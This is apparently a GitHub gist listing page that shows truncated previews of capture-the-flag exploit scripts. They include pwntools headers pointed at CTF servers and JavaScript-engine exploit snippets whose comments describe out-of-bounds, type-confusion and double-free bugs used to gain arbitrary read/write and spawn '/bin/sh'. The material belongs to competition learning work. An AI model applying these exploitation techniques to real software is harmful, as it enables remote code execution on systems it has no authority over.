dkdna
/ cloudSettings
Last active
April 8, 2021 15:39
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| {"lastUpload":"2021-04-08T15:39:23.940Z","extensionVersion":"v3.4.3"} |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python3 | |
| from pwn import * | |
| import sys | |
| remote_ip, port = 'shapes-01.play.midnightsunctf.se', 1111 | |
| binary = './chall' | |
| brkpts = ''' | |
| ''' |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| from pwn import * | |
| import sys | |
| import ctypes | |
| from ctypes import * | |
| remote_ip, port = 'liars.pwni.ng', 2018 | |
| binary = './liarmod' | |
| brkpts = ''' |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| Bug: typecasting uint8_t* ab.backingStore to uint16_t* ta.mem while converting ArrayBuffer to Uint16Array, | |
| but not reducing length, allows oob r/w. | |
| Exploit: create ArrayBuffer of same size as JSObject, so that they come consecutively in memory, | |
| use oob r/w to overwrite JSObject metadata, construct arbitrary r/w primitives, overwrite | |
| Array constructor with system, JSState with "/bin/sh" | |
| */ | |
| test = new ArrayBuffer(0x70); |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // tl;dr : arbitrary type confusion by removing a CheckStructure node | |
| // Full writeup coming soon :) | |
| var tmp_buf = new ArrayBuffer(8) | |
| var f64 = new Float64Array(tmp_buf) | |
| var u32 = new Uint32Array(tmp_buf) | |
| var BASE = 0x100000000 | |
| function f2i(f) { | |
| f64[0] = f |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| var tmp_buf = new ArrayBuffer(8) | |
| var f64 = new Float64Array(tmp_buf) | |
| var u32 = new Uint32Array(tmp_buf) | |
| var BASE = 0x100000000 | |
| function f2i(f) { | |
| f64[0] = f | |
| return u32[0] + BASE*u32[1] | |
| } | |
| function i2f(i) { |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| var tmp_buf = new ArrayBuffer(8) | |
| var f64 = new Float64Array(tmp_buf) | |
| var u32 = new Uint32Array(tmp_buf) | |
| var BASE = 0x100000000 | |
| function f2i(f) { | |
| f64[0] = f | |
| return u32[0] + BASE*u32[1] | |
| } | |
| function i2f(i) { |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| def tmp(): | |
| new = 0x4eb9059 | |
| new = 0x4eb9054 | |
| new = 0x4eb905f | |
| new = 0x4eb006a | |
| new = 0x4eb905e | |
| new = 0x4eb3b6a | |
| new = 0x4eb9058 | |
| new = 0x4eb006a |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| tl;dr: | |
| Double free an object (a), cause a JsObject (d) to overlap with a non-sparse array (c) | |
| Use this to read addresses as strings, convert back to integers | |
| Use shrstr in JsValue to overwrite array pointer for arbitrary r/w | |
| */ | |
| function hex(x) { | |
| return "0x" + x.toString(16) | |
| } |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| let ab = new ArrayBuffer(8); | |
| let f64a = new Float64Array(ab); | |
| let u64a = new BigUint64Array(ab); | |
| function f2i(v) { | |
| f64a[0] = v; | |
| return u64a[0]; | |
| } | |
| function i2f(v) { | |
| u64a[0] = v; | |
| return f64a[0]; |
OlderNewer